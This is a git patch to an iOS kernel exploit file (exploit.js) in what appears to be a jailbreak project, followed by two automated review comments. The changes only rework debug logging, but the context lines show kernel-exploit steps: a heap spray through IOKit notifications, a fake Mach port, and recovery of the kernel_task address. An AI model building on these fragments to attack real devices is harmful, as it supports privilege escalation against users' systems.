From eb21089efd298dfec49ebd2836105f5d900d50ae Mon Sep 17 00:00:00 2001
From: spv420
Date: Sun, 31 Jul 2022 03:40:20 -0400
Subject: fuck

---
 src/stage4/kexp/exploit.js | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index 04b7c34..aa10126 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -187,7 +187,7 @@ function spray(dict, size, port) {
 ret = host_get_io_master(mach_host_self(), master);
 // p0laris_log("yahtzee3 %d (%s) %p\n", ret, mach_error_string(ret), read_u32(master));
-// scall("p0laris_log", "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", master, 0x41414141, "IOServiceTerminate", 0x41414141, dict, 0x41414141, size, 0x41414141, MACH_PORT_NULL, 0x41414141, NULL, 0x41414141, 0, 0x41414141, err, 0x41414141, port, 0x41414141);
+// p0laris_log("0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", master, 0x41414141, "IOServiceTerminate", 0x41414141, dict, 0x41414141, size, 0x41414141, MACH_PORT_NULL, 0x41414141, NULL, 0x41414141, 0, 0x41414141, err, 0x41414141, port, 0x41414141);
 ret = io_service_add_notification_ool(read_u32(master), "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
 // p0laris_log("yahtzee %d (%s)\n", ret, mach_error_string(ret));
@@ -368,7 +368,7 @@ function mach_ports_lookup_shit() {
 calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
 puts("helo");
 p0laris_log("mpl success\n");
- scall("p0laris_log", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+ p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
 p0laris_log("mpl success\n");
 return read_u32(read_u32(arrz) + 8);
@@ -479,7 +479,7 @@ again: while (true) {
 // mach_ports_lookup_shit_dealloc();
 var ret__ = r3gister(mach_task_self(), arrz, 2, 3);
 mach_ports_lookup(mach_task_self(), arrz, sz);
- scall("p0laris_log", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+ p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
 p0laris_log("mpl success\n");
 var fake_port = read_u32(read_u32(arrz) + 8);
@@ -537,7 +537,7 @@ again: while (true) {
 p0laris_log("fuck\n");
 var kernel_task_addr = shit_heap(4);
 p0laris_log("fuck\n");
- scall("p0laris_log", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
+ p0laris_log("kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
 ret__ = pid_for_task(fake_port, kernel_task_addr);
 p0laris_log("%d %s\n", ret__, mach_error_string(ret__));
 p0laris_log("fuck\n");
@@ -547,7 +547,7 @@ again: while (true) {
 if (kernel_task_addr === 0xffffffff) {
 continue again;
 }
- scall("p0laris_log", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
+ p0laris_log("kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
 p0laris_log("fuck\n");
 p0laris_log("get lucky\n");
-- 
cgit v1.2.3
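Review bot: The new `p0laris_log("done %x %x %x %x\n", ...)` line in the `@@ -368` hunk calls `read_u32(arrz)` three times and the `return read_u32(read_u32(arrz) + 8);` two lines below reads it a fourth time; the same line recurs verbatim in the `@@ -479` hunk, where `var fake_port = read_u32(read_u32(arrz) + 8);` repeats the read once more. Hoisting the base once, `var ports = read_u32(arrz);`, and using `read_u32(ports + 0)`, `read_u32(ports + 4)`, `read_u32(ports + 8)` in the log and in the following line ties the value that is logged to the one that is returned or stored instead of re-deriving it. The two `p0laris_log("mpl success\n")` calls that bracket the new line in the first hunk read like leftover debug output; if both are intentional, a short comment saying what each one marks would help the next reader. mach_ports_lookup_shit and the `again:` loop around the second copy start and end outside their hunks.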
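Review bot: `p0laris_log("kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));` is now emitted twice for the same buffer: in the `@@ -537` hunk before `ret__ = pid_for_task(fake_port, kernel_task_addr);` and again in the `@@ -547` hunk after the `continue again` check. The first read happens before `pid_for_task` runs, so it presumably prints whatever `shit_heap(4)` left in the freshly allocated buffer, and two identical messages carrying different values are hard to tell apart in a log; either drop the first one or distinguish them, e.g. `"kernel_task address (pre-call): 0x%08x\n"` for the first and the existing text for the second. The `again:` loop enclosing both hunks starts and ends outside them, and lines 544–546 between the two hunks are not in the diff, so I cannot confirm whether kernel_task_addr is reassigned before the second log.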